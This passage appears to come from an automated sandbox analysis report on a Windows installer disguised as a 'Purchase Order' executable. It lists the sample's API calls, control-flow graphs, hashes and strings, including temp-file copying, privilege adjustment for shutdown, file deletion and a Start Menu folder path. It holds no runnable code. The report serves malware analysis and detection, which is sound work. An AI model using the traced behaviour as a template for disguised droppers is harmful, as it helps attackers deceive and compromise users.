                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403746
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403751
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040375D
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403779
                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?,?,00000006,?,0000000A), ref: 004037D3
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,0042AA08,00000001,?,00000006,?,0000000A), ref: 004037E7
                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,?,0000000A), ref: 00403814
                                              • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403843
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                              • ExitProcess.KERNEL32 ref: 004038CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-3189316464
                                              • Opcode ID: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                              • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                              • Opcode Fuzzy Hash: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                              • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                              Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 139 404c9e-404cea GetDlgItem * 2 140 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404f0b-404f12 139->141 142 404d93-404d9a DeleteObject 140->142 143 404d86-404d91 SendMessageW 140->143 144 404f14-404f24 141->144 145 404f26 141->145 147 404d9c-404da4 142->147 143->142 146 404f29-404f32 144->146 145->146 148 404f34-404f37 146->148 149 404f3d-404f43 146->149 150 404da6-404da9 147->150 151 404dcd-404dd1 147->151 148->149 153 405021-405028 148->153 156 404f52-404f59 149->156 157 404f45-404f4c 149->157 154 404dab 150->154 155 404dae-404dcb call 4062dc SendMessageW * 2 150->155 151->147 152 404dd3-404dff call 404231 * 2 151->152 195 404e05-404e0b 152->195 196 404eca-404edd GetWindowLongW SetWindowLongW 152->196 162 405099-4050a1 153->162 163 40502a-405030 153->163 154->155 155->151 159 404f5b-404f5e 156->159 160 404fce-404fd1 156->160 157->153 157->156 168 404f60-404f67 159->168 169 404f69-404f7e call 404bec 159->169 160->153 164 404fd3-404fdd 160->164 166 4050a3-4050a9 SendMessageW 162->166 167 4050ab-4050b2 162->167 171 405281-405293 call 404298 163->171 172 405036-405040 163->172 174 404fed-404ff7 164->174 175 404fdf-404feb SendMessageW 164->175 166->167 176 4050b4-4050bb 167->176 177 4050e6-4050ed 167->177 168->160 168->169 169->160 194 404f80-404f91 169->194 172->171 180 405046-405055 SendMessageW 172->180 174->153 182 404ff9-405003 174->182 175->174 183 4050c4-4050cb 176->183 184 4050bd-4050be ImageList_Destroy 176->184 187 405243-40524a 177->187 188 4050f3-4050ff call 4011ef 177->188 180->171 189 40505b-40506c SendMessageW 180->189 190 405014-40501e 182->190 191 405005-405012 182->191 192 4050d4-4050e0 183->192 193 4050cd-4050ce GlobalFree 183->193 184->183 187->171 200 40524c-405253 187->200 213 405101-405104 188->213 214 40510f-405112 188->214 198 405076-405078 189->198 199 40506e-405074 189->199 190->153 191->153 192->177 193->192 194->160 202 404f93-404f95 194->202 203 404e0e-404e15 195->203 201 404ee3-404ee7 196->201 205 405079-405092 call 401299 SendMessageW 198->205 199->198 199->205 200->171 206 405255-40527f ShowWindow GetDlgItem ShowWindow 200->206 207 404f01-404f09 call 404266 201->207 208 404ee9-404efc ShowWindow call 404266 201->208 209 404f97-404f9e 202->209 210 404fa8 202->210 211 404eab-404ebe 203->211 212 404e1b-404e43 203->212 205->162 206->171 207->141 208->171 221 404fa0-404fa2 209->221 222 404fa4-404fa6 209->222 225 404fab-404fc7 call 40117d 210->225 211->203 216 404ec4-404ec8 211->216 223 404e45-404e7b SendMessageW 212->223 224 404e7d-404e7f 212->224 226 405106 213->226 227 405107-40510a call 404c6c 213->227 217 405153-405177 call 4011ef 214->217 218 405114-40512d call 4012e2 call 401299 214->218 216->196 216->201 241 405219-40522d InvalidateRect 217->241 242 40517d 217->242 247 40513d-40514c SendMessageW 218->247 248 40512f-405135 218->248 221->225 222->225 223->211 229 404e81-404e90 SendMessageW 224->229 230 404e92-404ea8 SendMessageW 224->230 225->160 226->227 227->214 229->211 230->211 241->187 244 40522f-40523e call 404bbf call 404ba7 241->244 245 405180-40518b 242->245 244->187 249 405201-405213 245->249 250 40518d-40519c 245->250 247->217 253 405137 248->253 254 405138-40513b 248->254 249->241 249->245 251 40519e-4051ab 250->251 252 4051af-4051b2 250->252 251->252 256 4051b4-4051b7 252->256 257 4051b9-4051c2 252->257 253->254 254->247 254->248 259 4051c7-4051ff SendMessageW * 2 256->259 257->259 260 4051c4 257->260 259->249 260->259
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                              • GetDlgItem.USER32(?,?), ref: 00404CC1
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404D0B
                                              • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                              • SetWindowLongW.USER32(?,?,00405296), ref: 00404D37
                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404D4B
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                              • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D91
                                              • DeleteObject.GDI32(00000000), ref: 00404D94
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                              • GetWindowLongW.USER32(?,?), ref: 00404ECF
                                              • SetWindowLongW.USER32(?,?,00000000), ref: 00404EDD
                                              • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405065
                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00405089
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                              • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                              • GlobalFree.KERNEL32(?), ref: 004050CE
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                              • ShowWindow.USER32(?,00000000), ref: 0040526D
                                              • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                              • ShowWindow.USER32(00000000), ref: 0040527F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                              • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                              • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                              • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                              Function 70121B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 7012121B: GlobalAlloc.KERNEL32(?,?,7012123B,?,701212DF,00000019,701211BE,-000000A0), ref: 70121225
                                              • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 70121C6F
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 70121CB7
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 70121CC1
                                              • GlobalFree.KERNEL32(00000000), ref: 70121CD4
                                              • GlobalFree.KERNEL32(?), ref: 70121DB6
                                              • GlobalFree.KERNEL32(?), ref: 70121DBB
                                              • GlobalFree.KERNEL32(?), ref: 70121DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 70121FAA
                                              • lstrcpyW.KERNEL32(?,?), ref: 70122144
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 701221B9
                                              • LoadLibraryW.KERNEL32(00000008), ref: 701221CA
                                              • GetProcAddress.KERNEL32(?,?), ref: 70122224
                                              • lstrlenW.KERNEL32(00000808), ref: 7012223E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: 44424194c01daee4171c1422cfde9cd4a34b87ca2c62d4a283943833e16987f0
                                              • Instruction ID: 7eacc90f46aad8fa079d3b53779a0338383f467e2d9a2e69e994792aee839c6d
                                              • Opcode Fuzzy Hash: 44424194c01daee4171c1422cfde9cd4a34b87ca2c62d4a283943833e16987f0
                                              • Instruction Fuzzy Hash: 3F22BE71F00209EFCB12CFA4ED846EEB7B5FB14316F22456EE1A6E3680D7745A819B50
                                              Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 782 4059cc-4059f2 call 405c97 785 4059f4-405a06 DeleteFileW 782->785 786 405a0b-405a12 782->786 787 405b88-405b8c 785->787 788 405a14-405a16 786->788 789 405a25-405a35 call 4062ba 786->789 790 405b36-405b3b 788->790 791 405a1c-405a1f 788->791 797 405a44-405a45 call 405bdb 789->797 798 405a37-405a42 lstrcatW 789->798 790->787 794 405b3d-405b40 790->794 791->789 791->790 795 405b42-405b48 794->795 796 405b4a-405b52 call 4065fd 794->796 795->787 796->787 806 405b54-405b68 call 405b8f call 405984 796->806 800 405a4a-405a4e 797->800 798->800 802 405a50-405a58 800->802 803 405a5a-405a60 lstrcatW 800->803 802->803 805 405a65-405a81 lstrlenW FindFirstFileW 802->805 803->805 807 405a87-405a8f 805->807 808 405b2b-405b2f 805->808 822 405b80-405b83 call 405322 806->822 823 405b6a-405b6d 806->823 810 405a91-405a99 807->810 811 405aaf-405ac3 call 4062ba 807->811 808->790 813 405b31 808->813 814 405a9b-405aa3 810->814 815 405b0e-405b1e FindNextFileW 810->815 824 405ac5-405acd 811->824 825 405ada-405ae5 call 405984 811->825 813->790 814->811 818 405aa5-405aad 814->818 815->807 821 405b24-405b25 FindClose 815->821 818->811 818->815 821->808 822->787 823->795 827 405b6f-405b7e call 405322 call 406080 823->827 824->815 828 405acf-405ad8 call 4059cc 824->828 833 405b06-405b09 call 405322 825->833 834 405ae7-405aea 825->834 827->787 828->815 833->815 837 405aec-405afc call 405322 call 406080 834->837 838 405afe-405b04 834->838 837->815 838->815
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059F5
                                              • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A3D
                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A60
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A66
                                              • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A76
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                              • FindClose.KERNEL32(00000000), ref: 00405B25
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 004059CC
                                              • \*.*, xrefs: 00405A37
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-77064557
                                              • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                              • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                              • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                              • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                              Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 975 40264a-402663 call 402c1f 978 402ac5-402ac8 975->978 979 402669-402670 975->979 980 402ace-402ad4 978->980 981 402672 979->981 982 402675-402678 979->982 981->982 984 4027dc-4027e4 982->984 985 40267e-40268d call 40621a 982->985 984->978 985->984 988 402693 985->988 989 402699-40269d 988->989 990 402732-402735 989->990 991 4026a3-4026be ReadFile 989->991 993 402737-40273a 990->993 994 40274d-40275d call 405e33 990->994 991->984 992 4026c4-4026c9 991->992 992->984 995 4026cf-4026dd 992->995 993->994 996 40273c-402747 call 405e91 993->996 994->984 1002 40275f 994->1002 999 4026e3-4026f5 MultiByteToWideChar 995->999 1000 402798-4027a4 call 406201 995->1000 996->984 996->994 999->1002 1003 4026f7-4026fa 999->1003 1000->980 1006 402762-402765 1002->1006 1007 4026fc-402707 1003->1007 1006->1000 1009 402767-40276c 1006->1009 1007->1006 1010 402709-40272e SetFilePointer MultiByteToWideChar 1007->1010 1011 4027a9-4027ad 1009->1011 1012 40276e-402773 1009->1012 1010->1007 1013 402730 1010->1013 1015 4027ca-4027d6 SetFilePointer 1011->1015 1016 4027af-4027b3 1011->1016 1012->1011 1014 402775-402788 1012->1014 1013->1002 1014->984 1017 40278a-402790 1014->1017 1015->984 1018 4027b5-4027b9 1016->1018 1019 4027bb-4027c8 1016->1019 1017->989 1020 402796 1017->1020 1018->1015 1018->1019 1019->984 1020->984
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                              • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                              • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                              • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                              Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                              • API String ID: 542301482-2837566543
                                              • Opcode ID: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                              • Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
                                              • Opcode Fuzzy Hash: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                              • Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                              Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
                                              • FindClose.KERNEL32(00000000), ref: 00406614
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                              • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                              • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                              • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                              Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
